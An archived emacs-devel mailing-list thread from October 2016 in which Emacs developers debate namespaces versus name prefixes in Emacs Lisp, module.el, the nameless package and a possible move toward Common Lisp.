* Re: Emacs Lisp's future 2016-10-10 9:00 ` Richard Stallman @ 2016-10-11 1:42 ` Richard Stallman 2016-10-11 7:47 ` Helmut Eller 2016-10-12 3:17 ` Tom Tromey 0 siblings, 2 replies; 404+ messages in thread From: Richard Stallman @ 2016-10-11 1:42 UTC (permalink / raw) To: eller.helmut; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] The reason namespaces systems do not fit well into Lisp is that they have to operate in 'read', in the choice of which symbol object you get. I looked very briefly at the Clojure namespace spec and saw that it operates as part of evaluation, not as part of reading. Perhaps that explains why it is usable. Namespaces can work reasonably well as part of evaluation. However, that doesn't fit Lisp. Clojure is not Lisp. -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 1:42 ` Richard Stallman @ 2016-10-11 7:47 ` Helmut Eller 2016-10-11 14:44 ` Elias Mårtenson 2016-10-12 3:17 ` Tom Tromey 1 sibling, 1 reply; 404+ messages in thread From: Helmut Eller @ 2016-10-11 7:47 UTC (permalink / raw) To: emacs-devel; +Cc: rms On Mon, Oct 10 2016, Richard Stallman wrote: > The reason namespaces systems do not fit well into Lisp > is that they have to operate in 'read', in the choice of which > symbol object you get. I would say that namespaces manage symbols. In contrast, modules manage bindings. The annoyance in Common Lisp is mostly that packages have to exist before READ can intern symbols in a particular package. That would be problematic for autoload cookies or customizations in .emacs which are commonly executed before loading the code that actually defines the package. The other annoyance in Common Lisp is that occasionally one gets name conflict errors when importing a package because a symbol was accidentally interned in the current package with READ. People then often get confused by the error message and quickly jump to the conclusion that the package system must suck. It's in fact a pilot error and the package system just does its job of keeping the namespace clean. > I looked very briefly at the Clojure namespace spec and saw that it > operates as part of evaluation, not as part of reading. Perhaps that > explains why it is usable. Namespaces can work reasonably well as > part of evaluation. However, that doesn't fit Lisp. > > Clojure is not Lisp. I guess then Scheme isn't Lisp either. BTW, Rep, the Lisp dialect used by the Sawfish window manager which initially looked very similar to Emacs Lisp, also eventually added a module system. Apparently without too much trouble. Helmut ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 7:47 ` Helmut Eller @ 2016-10-11 14:44 ` Elias Mårtenson 0 siblings, 0 replies; 404+ messages in thread From: Elias Mårtenson @ 2016-10-11 14:44 UTC (permalink / raw) To: Helmut Eller; +Cc: rms, emacs-devel [-- Attachment #1: Type: text/plain, Size: 1524 bytes --] On 11 October 2016 at 15:47, Helmut Eller <eller.helmut@gmail.com> wrote: > On Mon, Oct 10 2016, Richard Stallman wrote: > > > The reason namespaces systems do not fit well into Lisp > > is that they have to operate in 'read', in the choice of which > > symbol object you get. > > I would say that namespaces manage symbols. In contrast, modules manage > bindings. > That's an interesting way of putting it. > The annoyance in Common Lisp is mostly that packages have to exist > before READ can intern symbols in a particular package. That would be > problematic for autoload cookies or customizations in .emacs which are > commonly executed before loading the code that actually defines the > package. > That can be dealt with by transparently creating a package during READ. Common Lisp doesn't do this, but it can be argued that it should. > The other annoyance in Common Lisp is that occasionally one gets name > conflict errors when importing a package because a symbol was > accidentally interned in the current package with READ. People then > often get confused by the error message and quickly jump to the > conclusion that the package system must suck. It's in fact a pilot > error and the package system just does its job of keeping the namespace > clean. > What I do is simply never importing symbols from other packages. If I need to refer to a symbol in a different package, I always fully qualify it. If a package system was implemented in Emacs Lisp, it would make sense to enforce this. Elias [-- Attachment #2: Type: text/html, Size: 2292 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 1:42 ` Richard Stallman 2016-10-11 7:47 ` Helmut Eller @ 2016-10-12 3:17 ` Tom Tromey 2016-10-13 21:23 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Tom Tromey @ 2016-10-12 3:17 UTC (permalink / raw) To: Richard Stallman; +Cc: eller.helmut, emacs-devel >>>>> "RMS" == Richard Stallman <rms@gnu.org> writes: RMS> The reason namespaces systems do not fit well into Lisp RMS> is that they have to operate in 'read', in the choice of which RMS> symbol object you get. That's pretty much what my module implementation does: it renames symbols while reading. https://github.com/tromey/emacs-module This means the source code uses short names, but the result respects the Emacs naming conventions. Tom ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-12 3:17 ` Tom Tromey @ 2016-10-13 21:23 ` Richard Stallman 2016-10-13 21:35 ` Tom Tromey 0 siblings, 1 reply; 404+ messages in thread From: Richard Stallman @ 2016-10-13 21:23 UTC (permalink / raw) To: Tom Tromey; +Cc: eller.helmut, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > That's pretty much what my module implementation does: it renames > symbols while reading. A priori that sounds bad, but maybe you've found a way of handling this that is better than what I've seen (in Common Lisp, for instance). > https://github.com/tromey/emacs-module It would take a lot of work for me to try to find the code by looking at that directory, and then a lot more work for me to figure out what the package does by reading the code. Would you please post the documentation here? -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-13 21:23 ` Richard Stallman @ 2016-10-13 21:35 ` Tom Tromey 2016-10-17 0:44 ` Richard Stallman 0 siblings, 1 reply; 404+ messages in thread From: Tom Tromey @ 2016-10-13 21:35 UTC (permalink / raw) To: Richard Stallman; +Cc: Tom Tromey, eller.helmut, emacs-devel RMS> It would take a lot of work for me to try to find the code RMS> by looking at that directory, and then a lot more work for me RMS> to figure out what the package does by reading the code. RMS> Would you please post the documentation here? I've appended it. I can send the source if you want as well. It's short (388 LOC including comments). The essence of it is hooking internal-macroexpand-for-load to rewrite forms. Tom This is a simple module system for Emacs Lisp, inspired by [Nic Ferrier's proposal](https://lists.gnu.org/archive/html/emacs-devel/2013-07/msg00738.html). It allows short symbol names in the source code but exports the names using the standard elisp-style module prefixes. To define a module, see `define-module`. After a `define-module`, some symbols in the current load file will be renamed. In particular, symbols coming from `defvar`, `defconst`, `defun` and the like will be renamed -- but other symbols will not be. This feature is critical to keeping normal Elisp working, as the Emacs core sometimes requires certain symbol names in APIs. Note that a private symbol must be seen -- declared with `defvar` or the like -- before any uses. Otherwise the renamer will not know to rename the use. Normally this is not a problem but you must take care to declare internal functions when you need mutual recursion. You can do this like so: ```elisp (declare-internal-function private-function) ``` When renaming, exported symbols will be given the package prefix, and internal symbols will use the "--" convention. E.g., consider: ```elisp (define-module testmodule :export (somevar)) (defvar somevar nil) (defvar private nil) (provide 'testmodule) ``` This defines a module named `testmodule` and two variables, an "exported" one named `testmodule-somevar`, and a "private" one named `testmodule--private`. Symbols from other modules can be imported using `import-module`. Because module boundaries are purely based on symbol naming conventions, you can also "import" from modules that do not use module.el. These modules are called "implicit" modules. Importing a module also `require`s the feature. ```elisp (define-module testmodule) ;; Import some symbols from M. (import-module M :symbols (a b c)) ``` Sometimes, for an implicit module, the name of the feature and the name of the module prefix differ. In this case you can use the `:prefix` keyword: ```elisp (import-module cl-macs :prefix cl) ``` A module is closed by calling `provide`. This module system doesn't have an explicit notion of submodules. Rather, it piggy-backs on the existing feature of `require`, that lets a directory separator in the symbol name load a file from a subdirectory: ```elisp (require 'feature/subfeature) ``` ### Caveats The renaming is not perfect. If your code uses `intern` or otherwise reflects on symbols then you have to be aware of the transforms done by module.el. Another issue is that autoload cookies aren't rewritten. This seems reasonably hard to fix, since they can refer to any symbol and so the cookie extraction code would have to duplicate the importing logic. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-13 21:35 ` Tom Tromey @ 2016-10-17 0:44 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2016-10-17 0:44 UTC (permalink / raw) To: Tom Tromey; +Cc: tom, eller.helmut, emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] I have a feeling that problems will arise where a certain name needs to be used in one way as a variable or function, and another way for comparisons with eq. I can't come up with any case that fails, so this is just a suspicion. -- Dr Richard Stallman President, Free Software Foundation (gnu.org, fsf.org) Internet Hall-of-Famer (internethalloffame.org) Skype: No way! See stallman.org/skype.html. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-08 20:57 ` Richard Stallman 2016-10-08 21:40 ` Nicolas Petton 2016-10-08 22:15 ` Helmut Eller @ 2016-10-10 4:09 ` Georges Ko 2016-10-10 4:51 ` Clément Pit--Claudel 2016-10-10 15:26 ` raman 2 siblings, 2 replies; 404+ messages in thread From: Georges Ko @ 2016-10-10 4:09 UTC (permalink / raw) To: emacs-devel Richard Stallman <rms@gnu.org> writes: > Namespace systems do not fit well into Lisp. Common Lisp's is a total > mess. It is better to use name prefixes. A first step could be to provide some simple prefix support for users, not stuff that comes with Emacs. Example: Let's say I want to write some code in sqlited.el to edit SQLite files. Instead of prefixing everything with sqlited- in sqlited.el, I would add this to the top of the file: (set-current-prefix 'sqlited-) and "magically", everything that is defined (functions, variables, ...) in this file are prefixed with "sqlited-" from the Emacs Lisp reader point of view: (defun file-header (file) ...) is read by the reader as: (defun sqlited-file-header (file) ...) When looking up for functions, variables, etc., in this file, the reader would first search with the sqlited- prefix, then the version without prefix. "Global" elements (without prefix) can be defined and used through some virtual prefix such as "emacs:": (defvar emacs:sqlited-load-hook nil) (defun emacs:sqlited-edit-file (...) (interactive) ...) Or it could be defined that anything starting with the prefix means global, like now: (defvar sqlited-load-hook nil) (defun sqlited-edit-file (...) (interactive) ...) Or the user can set it explicitely: (set-global-prefix 'g:) ... (defvar g:sqlited-load-hook nil) (defun g:sqlited-edit-file (...) (interactive) ...) When accessing elements using other prefixes: (require "sqlited-viewer") (set-prefix-map 'v: 'sqlited-viewer-) (v:view-file "...") v:view-file would be read as sqlited-viewer-view-file. -- Georges Ko gko@gko.net 2016-10-10 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-10 4:09 ` Georges Ko @ 2016-10-10 4:51 ` Clément Pit--Claudel 2016-10-10 13:56 ` Georges Ko 2016-10-10 15:26 ` raman 1 sibling, 1 reply; 404+ messages in thread From: Clément Pit--Claudel @ 2016-10-10 4:51 UTC (permalink / raw) To: emacs-devel [-- Attachment #1.1: Type: text/plain, Size: 264 bytes --] On 2016-10-10 00:09, Georges Ko wrote: > and "magically", everything that is defined (functions, variables, > ...) in this file are prefixed with "sqlited-" from the Emacs Lisp > reader point of view: Are you familiar with the names package? Clément. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-10 4:51 ` Clément Pit--Claudel @ 2016-10-10 13:56 ` Georges Ko 2016-10-11 4:06 ` Marcin Borkowski 0 siblings, 1 reply; 404+ messages in thread From: Georges Ko @ 2016-10-10 13:56 UTC (permalink / raw) To: emacs-devel Clément Pit--Claudel <clement.pit@gmail.com> writes: >> and "magically", everything that is defined (functions, variables, >> ...) in this file are prefixed with "sqlited-" from the Emacs Lisp >> reader point of view: > > Are you familiar with the names package? It looks exactly what I had in mind :). Thanks! Georges -- Georges Ko gko@gko.net 2016-10-10 ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-10 13:56 ` Georges Ko @ 2016-10-11 4:06 ` Marcin Borkowski 2016-10-11 4:18 ` Clément Pit--Claudel 0 siblings, 1 reply; 404+ messages in thread From: Marcin Borkowski @ 2016-10-11 4:06 UTC (permalink / raw) To: Georges Ko; +Cc: emacs-devel On 2016-10-10, at 15:56, Georges Ko <gko@gko.net> wrote: >> Are you familiar with the names package? > > It looks exactly what I had in mind :). Thanks! Be sure to check out also the nameless package by the same author! > Georges BTW, someone (Raman?) on this thread said that namespaces save typing. That's not exactly right; that goal is achieved with autocompletion (as he already noticed). What namespaces really do is twofold: 1. Help avoid collisions, and 2. (last but not least!) save on reading. Long function names are really bad. Elisp is not Java. Best, -- Marcin Borkowski ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 4:06 ` Marcin Borkowski @ 2016-10-11 4:18 ` Clément Pit--Claudel 2016-10-11 7:16 ` Marcin Borkowski 0 siblings, 1 reply; 404+ messages in thread From: Clément Pit--Claudel @ 2016-10-11 4:18 UTC (permalink / raw) To: emacs-devel [-- Attachment #1.1: Type: text/plain, Size: 686 bytes --] On 2016-10-11 00:06, Marcin Borkowski wrote: > BTW, someone (Raman?) on this thread said that namespaces save typing. > That's not exactly right; that goal is achieved with autocompletion (as > he already noticed). What namespaces really do is twofold: > > 1. Help avoid collisions, and > > 2. (last but not least!) save on reading. > > Long function names are really bad. I think nameless makes both of these a non-issue. You get "import x as y" using custom prefixes (such as fl: for font-lock), and for your own code there's no typing (C-- inserts the package prefix) and no wasted space. Bottom line: I don't see much use for proper namespaces :) Clément. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 4:18 ` Clément Pit--Claudel @ 2016-10-11 7:16 ` Marcin Borkowski 2016-10-11 13:33 ` Clément Pit--Claudel 0 siblings, 1 reply; 404+ messages in thread From: Marcin Borkowski @ 2016-10-11 7:16 UTC (permalink / raw) To: Clément Pit--Claudel; +Cc: emacs-devel On 2016-10-11, at 06:18, Clément Pit--Claudel <clement.pit@gmail.com> wrote: > On 2016-10-11 00:06, Marcin Borkowski wrote: >> BTW, someone (Raman?) on this thread said that namespaces save typing. >> That's not exactly right; that goal is achieved with autocompletion (as >> he already noticed). What namespaces really do is twofold: >> >> 1. Help avoid collisions, and >> >> 2. (last but not least!) save on reading. >> >> Long function names are really bad. > > I think nameless makes both of these a non-issue. You get "import x as y" using custom prefixes (such as fl: for font-lock), and for your own code there's no typing (C-- inserts the package prefix) and no wasted space. > > Bottom line: I don't see much use for proper namespaces :) That's only true to some extent. Both names and nameless packages (even though I really appreciate them) are really prosthetics; I'd have to check it, but how do they behave with tools like xref-find-definitions, edebug, lispy and others? I'm pretty sure that names won't cooperate with them nicely (I vaguely remember trying, though I'm not sure), I'd have to check nameless. Best, -- Marcin Borkowski ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 7:16 ` Marcin Borkowski @ 2016-10-11 13:33 ` Clément Pit--Claudel 2016-10-11 14:54 ` Elias Mårtenson 2016-10-11 17:08 ` Marcin Borkowski 0 siblings, 2 replies; 404+ messages in thread From: Clément Pit--Claudel @ 2016-10-11 13:33 UTC (permalink / raw) To: Marcin Borkowski; +Cc: emacs-devel [-- Attachment #1.1: Type: text/plain, Size: 1375 bytes --] On 2016-10-11 03:16, Marcin Borkowski wrote: > On 2016-10-11, at 06:18, Clément Pit--Claudel <clement.pit@gmail.com> wrote: > >> On 2016-10-11 00:06, Marcin Borkowski wrote: >>> BTW, someone (Raman?) on this thread said that namespaces save typing. >>> That's not exactly right; that goal is achieved with autocompletion (as >>> he already noticed). What namespaces really do is twofold: >>> >>> 1. Help avoid collisions, and >>> >>> 2. (last but not least!) save on reading. >>> >>> Long function names are really bad. >> >> I think nameless makes both of these a non-issue. You get "import x as y" using custom prefixes (such as fl: for font-lock), and for your own code there's no typing (C-- inserts the package prefix) and no wasted space. >> >> Bottom line: I don't see much use for proper namespaces :) > > That's only true to some extent. Both names and nameless packages (even > though I really appreciate them) are really prosthetics; I'd have to > check it, but how do they behave with tools like xref-find-definitions, > edebug, lispy and others? I'm pretty sure that names won't cooperate > with them nicely (I vaguely remember trying, though I'm not sure), I'd > have to check nameless. I never used names. Nameless works entirely fine with all of the tools you mentioned, because it only touches font-locking. Clément. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 13:33 ` Clément Pit--Claudel @ 2016-10-11 14:54 ` Elias Mårtenson 2016-10-11 15:10 ` Clément Pit--Claudel 2016-10-11 17:08 ` Marcin Borkowski 1 sibling, 1 reply; 404+ messages in thread From: Elias Mårtenson @ 2016-10-11 14:54 UTC (permalink / raw) To: Clément Pit--Claudel; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 866 bytes --] On 11 October 2016 at 21:33, Clément Pit--Claudel <clement.pit@gmail.com> wrote: > > I never used names. Nameless works entirely fine with all of the tools > you mentioned, because it only touches font-locking. All of these tools have the problem that it's difficult to tell what part of a symbol is its "namespace". How do you tell the difference between the symbols "foo-bar" without a namespace, or "bar" with namespace "foo"? Also, some Emacs Lisp packages have a dash in the name. How would an automated tool know that the symbol gnu-apl-interactive-mode is actually "interactive-mode" with the namespace "gnu-apl"? I guess I'm just curious as to why a separate symbol isn't used? : sounds good, and gnu-apl:interactive-mode would be much more clear. Automated tools would also be able to make more sense out of symbol names. Elias [-- Attachment #2: Type: text/html, Size: 1326 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 14:54 ` Elias Mårtenson @ 2016-10-11 15:10 ` Clément Pit--Claudel 2016-10-11 17:55 ` Elias Mårtenson 0 siblings, 1 reply; 404+ messages in thread From: Clément Pit--Claudel @ 2016-10-11 15:10 UTC (permalink / raw) To: Elias Mårtenson; +Cc: emacs-devel [-- Attachment #1.1: Type: text/plain, Size: 1410 bytes --] On 2016-10-11 10:54, Elias Mårtenson wrote: > On 11 October 2016 at 21:33, Clément Pit--Claudel > <clement.pit@gmail.com <mailto:clement.pit@gmail.com>> wrote: > >> I never used names. Nameless works entirely fine with all of the >> tools you mentioned, because it only touches font-locking. > > All of these tools have the problem that it's difficult to tell what > part of a symbol is its "namespace". How do you tell the difference > between the symbols "foo-bar" without a namespace, or "bar" with > namespace "foo"? Indeed. Have you had this problem in practice, though? > Also, some Emacs Lisp packages have a dash in the name. How would an > automated tool know that the symbol gnu-apl-interactive-mode is > actually "interactive-mode" with the namespace "gnu-apl"? It's generally sufficient to look at the name of the file that declares that function. For example, gnu-apl-interactive-mode presumably lives in gnu-apl.el. If not, then you can set a file-local variable indicating what the library's prefix is. > I guess I'm just curious as to why a separate symbol isn't used? : > sounds good, and gnu-apl:interactive-mode would be much more clear. > Automated tools would also be able to make more sense out of symbol > names. nameless uses ':' for display (and '::' for private members), indeed. Some packages use / (yas/, for example) Cheers, Clément. [-- Attachment #2: OpenPGP digital signature --] [-- Type: application/pgp-signature, Size: 819 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 15:10 ` Clément Pit--Claudel @ 2016-10-11 17:55 ` Elias Mårtenson 0 siblings, 0 replies; 404+ messages in thread From: Elias Mårtenson @ 2016-10-11 17:55 UTC (permalink / raw) To: Clément Pit--Claudel; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 2401 bytes --] On 11 October 2016 at 23:10, Clément Pit--Claudel <clement.pit@gmail.com> wrote: > On 2016-10-11 10:54, Elias Mårtenson wrote: > > > All of these tools have the problem that it's difficult to tell what > > part of a symbol is its "namespace". How do you tell the difference > > between the symbols "foo-bar" without a namespace, or "bar" with > > namespace "foo"? > > Indeed. Have you had this problem in practice, though? > That depends on how you define "having the problem". I don't use automated tools (such as nameless) partly because I find it somewhat hackish. I have been confused about it though. > It's generally sufficient to look at the name of the file that declares > that function. For example, gnu-apl-interactive-mode presumably lives in > gnu-apl.el. If not, then you can set a file-local variable indicating what > the library's prefix is. > It actually lives in a file called gnu-apl-interactive.el. > > I guess I'm just curious as to why a separate symbol isn't used? : > > sounds good, and gnu-apl:interactive-mode would be much more clear. > > Automated tools would also be able to make more sense out of symbol > > names. > > nameless uses ':' for display (and '::' for private members), indeed. > Some packages use / (yas/, for example) Presumably they do this because they agree with me that overloading the use of the - character for both word separation and namespace indicator is not optimal. The use of multiple different variations is even worse (which is why I, even though I don't agree with the practice of using - and --, conform to it). I'm merely trying to put the attention on this, to gauge just how many people agree with me. I suspect that not enough does. I still want to summarise what I'd like to see: Use : (or some other character other than -) to separate namespace and name. Use :: (or something else) to indicate private symbols. Then, standardised tooling in Emacs that would handle this convention could come later (as in something like nameless, or perhaps an extension to the reader to handle it). In other words: I think that as long as the character overloading problem is fixed and a standardised method is promoted, creating tools that implement pretty much everything people want from a namespace/package system can be implemented on top of this convention. Elias [-- Attachment #2: Type: text/html, Size: 3404 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-11 13:33 ` Clément Pit--Claudel 2016-10-11 14:54 ` Elias Mårtenson @ 2016-10-11 17:08 ` Marcin Borkowski 1 sibling, 0 replies; 404+ messages in thread From: Marcin Borkowski @ 2016-10-11 17:08 UTC (permalink / raw) To: Clément Pit--Claudel; +Cc: emacs-devel On 2016-10-11, at 15:33, Clément Pit--Claudel <clement.pit@gmail.com> wrote: >>> Bottom line: I don't see much use for proper namespaces :) >> >> That's only true to some extent. Both names and nameless packages (even >> though I really appreciate them) are really prosthetics; I'd have to >> check it, but how do they behave with tools like xref-find-definitions, >> edebug, lispy and others? I'm pretty sure that names won't cooperate >> with them nicely (I vaguely remember trying, though I'm not sure), I'd >> have to check nameless. > > I never used names. Nameless works entirely fine with all of the tools you mentioned, because it only touches font-locking. Cool to hear that. I guess I'll have to start using it. Best, -- Marcin Borkowski ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-10 4:09 ` Georges Ko 2016-10-10 4:51 ` Clément Pit--Claudel @ 2016-10-10 15:26 ` raman 1 sibling, 0 replies; 404+ messages in thread From: raman @ 2016-10-10 15:26 UTC (permalink / raw) To: Georges Ko; +Cc: emacs-devel Georges Ko <gko@gko.net> writes: All this would buy would be less typing -- but emacs completion does most of my typing for me anyway. another win perhaps might be for shorter lines because of shorter identifiers -- but for a large file, one might easily forget that the prefix has been set at the top -- e.g. when fixing a bug in the middle of a file. > Richard Stallman <rms@gnu.org> writes: > >> Namespace systems do not fit well into Lisp. Common Lisp's is a total >> mess. It is better to use name prefixes. > > A first step could be to provide some simple prefix support for users, > not stuff that comes with Emacs. > > Example: > > Let's say I want to write some code in sqlited.el to edit SQLite > files. Instead of prefixing everything with sqlited- in sqlited.el, I > would add this to the top of the file: > > (set-current-prefix 'sqlited-) > > and "magically", everything that is defined (functions, variables, > ...) in this file are prefixed with "sqlited-" from the Emacs Lisp > reader point of view: > > (defun file-header (file) ...) > > is read by the reader as: > > (defun sqlited-file-header (file) ...) > > When looking up for functions, variables, etc., in this file, > the reader would first search with the sqlited- prefix, then the > version without prefix. > > "Global" elements (without prefix) can be defined and used through > some virtual prefix such as "emacs:": > > (defvar emacs:sqlited-load-hook nil) > (defun emacs:sqlited-edit-file (...) (interactive) ...) > > Or it could be defined that anything starting with the prefix means > global, like now: > > (defvar sqlited-load-hook nil) > (defun sqlited-edit-file (...) (interactive) ...) > > Or the user can set it explicitely: > > (set-global-prefix 'g:) > ... > (defvar g:sqlited-load-hook nil) > (defun g:sqlited-edit-file (...) (interactive) ...) > > When accessing elements using other prefixes: > > (require "sqlited-viewer") > (set-prefix-map 'v: 'sqlited-viewer-) > (v:view-file "...") > > v:view-file would be read as sqlited-viewer-view-file. -- ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 10:47 ` Lars Brinkhoff 2016-10-07 11:03 ` Nikolay Kudryavtsev @ 2016-10-07 15:32 ` Kelvin White 2016-10-07 16:18 ` Søren Pilgård 2016-10-07 17:07 ` John Wiegley 3 siblings, 0 replies; 404+ messages in thread From: Kelvin White @ 2016-10-07 15:32 UTC (permalink / raw) To: Lars Brinkhoff; +Cc: Emacs development discussions On Fri, Oct 7, 2016 at 6:47 AM, Lars Brinkhoff <lars@nocrew.org> wrote: > Now that we have new maintainers, I'd be curious to hear if they have > any thoughs on this? (See the original post for more information.) > > Stefan Monnier wrote two years ago: >> I've had the opportunity to think a bit more about Emacs Lisp and its >> possible evolution and I'm still not sure what to think about it. >> [...] >> I think that ideally, we'd want to stick to Elisp, or some evolution >> thereof. Sadly, I don't see how to evolve Elisp into Scheme: they are >> closely related languages, but the differences are large enough that >> it seems hard to reconcile them. >> >> The only standard language into which Elisp can evolve, AFAICT, is >> Common Lisp. [ Now some readers get disappointed, while some others >> become excited. ] There are some incompatibilities between the two >> languages, but I can imagine working them out over the years, or even >> living with them without too much trouble, such that we could use >> Common-Lisp libraries in Emacs. > > I am all for the common-lisp evolution of Emacs-lisp, and willing to contribute. Just my two cents... ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 10:47 ` Lars Brinkhoff 2016-10-07 11:03 ` Nikolay Kudryavtsev 2016-10-07 15:32 ` Kelvin White @ 2016-10-07 16:18 ` Søren Pilgård 2016-10-07 16:25 ` Kaushal Modi 2016-10-08 2:09 ` Tom Tromey 2016-10-07 17:07 ` John Wiegley 3 siblings, 2 replies; 404+ messages in thread From: Søren Pilgård @ 2016-10-07 16:18 UTC (permalink / raw) To: Lars Brinkhoff; +Cc: emacs-devel On Fri, Oct 7, 2016 at 12:47 PM, Lars Brinkhoff <lars@nocrew.org> wrote: > Now that we have new maintainers, I'd be curious to hear if they have > any thoughs on this? (See the original post for more information.) > > Stefan Monnier wrote two years ago: >> I've had the opportunity to think a bit more about Emacs Lisp and its >> possible evolution and I'm still not sure what to think about it. >> [...] >> I think that ideally, we'd want to stick to Elisp, or some evolution >> thereof. Sadly, I don't see how to evolve Elisp into Scheme: they are >> closely related languages, but the differences are large enough that >> it seems hard to reconcile them. >> >> The only standard language into which Elisp can evolve, AFAICT, is >> Common Lisp. [ Now some readers get disappointed, while some others >> become excited. ] There are some incompatibilities between the two >> languages, but I can imagine working them out over the years, or even >> living with them without too much trouble, such that we could use >> Common-Lisp libraries in Emacs. > > First of all we need to decide what it really is that is wanted here. Is it just the underlying lisp engine or what exactly? Is it basically replacing the C parts with Common lisp code? That does not seem to gain much. Is it to discard Emacs lisp entirely (maybe in a longer process) and replace it with Common lisp This would discard decades of code and mountains of configurations for what gain exactly? Or is the goal to find a mapping of Emacs lisp to Common lisp. So we can build up the core concepts in common lisp and then map whatever Emacs code down into Common lisp? Then people will ask next if in the future can code for Emacs directly in Common lisp and not just in "legacy" Emacs lisp. Keeping this distinction in mind is important, especially when talking to people outside the development group. A lot of people had very different ideas and interpretations of what the Emacs-guile project intented to do and did. Be aware that Emacs lisp is not Common lisp and such a mapping does have some pitfalls, especially around dynamic scoping and buffer local variables. I remember some blogposts about this (from 2012) http://tromey.com/blog/?p=709 http://tromey.com/blog/?p=751 http://tromey.com/blog/?p=778 Personally I could fear that this mapping will insert certain restrictions of what can and can't be done in Common lisp code against Emacs, especially if we open up to everyday Emacs code in Common lisp. Basically it would be problematic if Common lisp could violate certain assumptions the Emacs code makes, like running "single threaded". Maybe this could be contained by hiding it somehow, but isn't all we get another internal implementation then? If the developers prefer to do the internal implementation in Common Lisp/Emacs Lisp rather than C/Emacs lisp and have easier access to expose some libraries then that is another thing. So when people talk about Emacs Lisp transitioning to Common Lisp, please specify exactly what you want. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2016-10-07 16:18 ` Søren Pilgård @ 2016-10-07 16:25 ` Kaushal Modi 2016-10-08 2:09 ` Tom Tromey 1 sibling, 0 replies; 404+ messages in thread From: Kaushal Modi @ 2016-10-07 16:25 UTC (permalink / raw) To: Søren Pilgård, Lars Brinkhoff; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 2795 bytes --] On Fri, Oct 7, 2016 at 12:20 PM Søren Pilgård <fiskomaten@gmail.com> wrote: > First of all we need to decide what it really is that is wanted here. > Is it just the underlying lisp engine or what exactly? > > Is it basically replacing the C parts with Common lisp code? > That does not seem to gain much. > > Is it to discard Emacs lisp entirely (maybe in a longer process) and > replace it with Common lisp > This would discard decades of code and mountains of configurations for > what gain exactly? > > Or is the goal to find a mapping of Emacs lisp to Common lisp. > So we can build up the core concepts in common lisp and then map > whatever Emacs code down into Common lisp? > Then people will ask next if in the future can code for Emacs directly > in Common lisp and not just in "legacy" Emacs lisp. > > Keeping this distinction in mind is important, especially when talking > to people outside the development group. > A lot of people had very different ideas and interpretations of what > the Emacs-guile project intented to do and did. > > Be aware that Emacs lisp is not Common lisp and such a mapping does > have some pitfalls, especially around dynamic scoping and buffer local > variables. > I remember some blogposts about this (from 2012) > http://tromey.com/blog/?p=709 http://tromey.com/blog/?p=751 > http://tromey.com/blog/?p=778 > > Personally I could fear that this mapping will insert certain > restrictions of what can > and can't be done in Common lisp code against Emacs, especially if we open > up to > everyday Emacs code in Common lisp. Basically it would be problematic if > Common > lisp could violate certain assumptions the Emacs code makes, like > running "single threaded". > Maybe this could be contained by hiding it somehow, but isn't all we > get another internal implementation then? > If the developers prefer to do the internal implementation in Common > Lisp/Emacs Lisp rather than C/Emacs lisp and have > easier access to expose some libraries then that is another thing. > > > So when people talk about Emacs Lisp transitioning to Common Lisp, > please specify exactly what you want. > Exactly my thoughts. My fear is that this supposed transition to Common Lisp with fragment the emacs user base.. some will stick with elisp and some will move over to CL. Elisp is working very well for configs and packages. We should rather stick with it and keep on growing the 